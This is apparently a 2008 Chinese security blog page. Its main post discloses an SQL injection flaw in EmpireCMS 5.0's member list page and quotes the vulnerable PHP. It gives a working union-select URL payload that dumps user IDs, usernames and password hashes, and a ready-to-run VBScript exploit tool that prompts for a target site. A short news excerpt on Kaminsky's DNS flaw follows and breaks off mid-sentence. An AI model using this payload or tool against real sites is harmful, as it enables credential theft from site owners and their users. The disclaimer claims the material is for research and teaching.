漏洞文件 /e/member/list/index.php文件:内容如下:if($sear){$keyboard=RepPostVar2($_GET['keyboard']);if($keyboard){$add.=$where.$user_username." like '%$keyboard%'";}$search.="&sear=1&keyboard=$keyboard";}
判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为空就直接把keyboard带入查询产生注射漏洞.<* 参考http://www.sebug.net/vulndb/3860/ http://www.nukeblog.cn*>测试方法:[www.sebug.net]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*
VBS利用程序代码如下
DIM a,i,e,b,ie,cmd5i=InputBox ("输入目标地址 格式http://www.phome.net","帝国CMS 0DAY利用程序 BY Nuke")If i="" Thenmsgbox "请输入地址"WScript.QuitEnd Ifb=InputBox ("输入表名默认为phome_enewsuser","帝国CMS 0DAY利用程序 BY Nuke","phome_enewsuser")If b="" Thenmsgbox "请输入表名"WScript.QuitEnd Ife = "/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+" & b & "/*"ie = i & eSet a=WScript.CreateObject("InternetExplorer.Application") a.visible=True a.navigate iemsgbox "32位的MD5祝你好运!"
2008年8月17日星期日
帝国CMS5.0“/e/member/list/index.php”文件注射漏洞
2008年8月9日星期六
专家:DNS缺陷很恐怖 黑客可攻击FTP等服务
8月9日消息,安全专家丹·卡明斯基在“黑帽”黑客会议上发言时表示,最近被发现的互联网地址系统中的一个缺陷比当初想像的要糟糕。
据国外媒体报道称,卡明斯基表示,对互联网域名系统(DNS)中该缺陷的修正主要集中在浏览器方面,但黑客可以以其它方式利用该缺陷。他说,所有网络都面临受到攻击的危险。
卡明斯基发现了一种攻击方法,即使用户输入正确的网址,黑客也能够劫持DNS,将用户引导到一个虚假网站。卡明斯基在发言中详细阐述了15种利用该缺陷的攻击方法。利用该缺陷,黑客可以攻击FTP服务、电子邮件服务、垃圾邮件过滤服务、Telnet、SSL
订阅:
博文 (Atom)